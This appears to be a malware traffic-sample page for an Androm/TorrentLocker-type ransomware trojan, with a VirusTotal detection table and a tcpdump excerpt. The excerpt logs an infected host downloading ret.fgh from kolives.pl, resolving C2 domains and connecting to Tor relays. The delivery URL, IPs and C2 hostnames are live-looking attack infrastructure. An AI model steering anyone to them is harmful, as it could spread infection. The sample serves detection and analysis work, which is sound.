
Androm Malware Trojan PCAP file download Traffic Sample ret.fgh TOR Botnet kolives.pl

Download Attachments

  • 1 pcap ret
    Date added: May 9, 2017 2:11 am
    Added by: admin
    File size: 48 KB
    Downloads: 66

VirusTotal scan of the downloaded sample:
SHA256: 15b7df3bebe6ee5e78fb3bc1baa585ef46801467755a5a168caf098d4bd60310
File name: ret.fgh
Detection ratio: 43 / 61
Analysis date: 2017-05-09 02:07:36 UTC


Antivirus | Result | Update
Ad-Aware | Trojan.GenericKD.4990716 | 20170509
AegisLab | Ml.Attribute.Gen!c | 20170509
AhnLab-V3 | Backdoor/Win32.Androm.C1931243 | 20170508
Arcabit | Trojan.Generic.D4C26FC | 20170509
AVG | Atros5.BCQI | 20170509
Avira (no cloud) | TR/Crypt.Xpack.buhvp | 20170509
AVware | Trojan.Win32.Generic!BT | 20170508
BitDefender | Trojan.GenericKD.4990716 | 20170509
CAT-QuickHeal | Backdoor.Androm | 20170508
DrWeb | Trojan.Encoder.761 | 20170508
Emsisoft | Trojan.GenericKD.4990716 (B) | 20170508
Endgame | malicious (high confidence) | 20170503
ESET-NOD32 | Win32/Filecoder.TorrentLocker.A | 20170509
F-Secure | Trojan.GenericKD.4990716 | 20170508
Fortinet | W32/Androm.NFCJ!tr.bdr | 20170508
GData | Win32.Trojan-Spy.Agent.ZL | 20170508
Ikarus | Trojan.Win32.Filecoder | 20170508
Invincea | virus.win32.sality.at | 20170413
Jiangmin | Backdoor.Androm.pjk | 20170508
K7AntiVirus | Trojan ( 004e26891 ) | 20170508
K7GW | Trojan ( 004e26891 ) | 20170508
Kaspersky | Backdoor.Win32.Androm.nfcj | 20170508
Malwarebytes | Ransom.Crypt0L0cker | 20170509
McAfee | Artemis!BE5C56E5F772 | 20170509
McAfee-GW-Edition | BehavesLike.Win32.PWSZbot.gc | 20170508
Microsoft | Ransom:Win32/Teerac | 20170509
eScan | Trojan.GenericKD.4990716 | 20170509
NANO-Antivirus | Trojan.Win32.Androm.eohsnw | 20170508
Palo Alto Networks (Known Signatures) | generic.ml | 20170509
Panda | Trj/CI.A | 20170508
Qihoo-360 | Trojan.Generic | 20170509
Rising | Ransom.Teerac!8.57A (cloud:IZp0FFxFPME) | 20170508
SentinelOne (Static ML) | static engine – malicious | 20170330
Sophos | Mal/Generic-S | 20170508
Symantec | Trojan.Gen.2 | 20170508
Tencent | Win32.Trojan.Inject.Auto | 20170509
TrendMicro | Ransom_Teerac.R08OC0DE617 | 20170509
TrendMicro-HouseCall | Ransom_Teerac.R08OC0DE617 | 20170509
VIPRE | Trojan.Win32.Generic!BT | 20170509
ViRobot | Trojan.Win32.Z.Androm.483328.N[h] | 20170508
Webroot | W32.Trojan.Gen | 20170509
ZoneAlarm by Check Point | Backdoor.Win32.Androm.nfcj | 20170509


Packet capture excerpt (tcpdump output; binary payload bytes omitted, readable content kept):

2017-05-08 19:53:32.015202 IP 192.168.1.102.54544 > 92.63.195.168.80: Flags [P.], seq 0:396, ack 1, win 256, length 396: HTTP: GET /file/ret.fgh HTTP/1.1
GET /file/ret.fgh HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: kolives.pl
Connection: Keep-Alive

2017-05-08 19:53:51.322616 IP 192.168.1.102.54549 > 31.31.76.169.443: Flags [P.], seq 0:102, ack 1, win 256, length 102
[binary payload omitted; contains the hostname www.93524h67ed8ph8794.com]
2017-05-08 19:53:51.497414 IP 192.168.1.102.54549 > 31.31.76.169.443: Flags [.], ack 925, win 253, length 0

2017-05-08 19:54:16.838141 IP 192.168.1.102.60151 > 75.75.75.75.53: 57503+ A? inify.hromotor.com. (36)
2017-05-08 19:54:16.845579 IP 192.168.1.102.60152 > 75.75.75.75.53: 57503+ A? inify.hromotor.com. (36)
2017-05-08 19:54:18.840896 IP 192.168.1.102.60151 > 75.75.75.75.53: 57503+ A? inify.hromotor.com. (36)
2017-05-08 19:54:18.846267 IP 192.168.1.102.60152 > 75.75.75.75.53: 57503+ A? inify.hromotor.com. (36)
2017-05-08 19:54:20.849064 IP 192.168.1.102.60152 > 75.75.75.75.53: 57503+ A? inify.hromotor.com. (36)
2017-05-08 19:54:20.857521 IP 192.168.1.102.60153 > 75.75.75.75.53: 705+ A? ipecho.net. (28)
2017-05-08 19:54:21.204761 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [S], seq 2350750627, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-05-08 19:54:21.315533 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [.], ack 3642134850, win 256, length 0
2017-05-08 19:54:21.316422 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [P.], seq 0:103, ack 1, win 256, length 103
[binary payload omitted; contains the hostname www.lnlj3a080d3n022ap2.com]
2017-05-08 19:54:21.480455 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [.], ack 927, win 253, length 0
2017-05-08 19:54:21.500570 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [P.], seq 103:242, ack 927, win 253, length 139
2017-05-08 19:54:21.644039 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [P.], seq 242:301, ack 927, win 253, length 59
2017-05-08 19:54:21.758580 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [P.], seq 301:338, ack 986, win 252, length 37
2017-05-08 19:54:21.899962 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [P.], seq 338:375, ack 986, win 252, length 37
2017-05-08 19:54:22.005679 IP 192.168.1.102.54552 > 46.38.241.16.9001: Flags [.], ack 2532, win 256, length 0

2017-05-08 19:54:25.523098 IP 192.168.1.102.54556 > 83.149.126.139.20612: Flags [P.], seq 0:95, ack 1, win 256, length 95
[binary payload omitted; contains the hostname www.0jpnndmjgn.com]
2017-05-08 19:54:25.676709 IP 192.168.1.102.54556 > 83.149.126.139.20612: Flags [.], ack 941, win 252, length 0
2017-05-08 19:54:25.693581 IP 192.168.1.102.54556 > 83.149.126.139.20612: Flags [P.], seq 95:234, ack 941, win 252, length 139
2017-05-08 19:54:25.832643 IP 192.168.1.102.54556 > 83.149.126.139.20612: Flags [P.], seq 234:293, ack 941, win 252, length 59
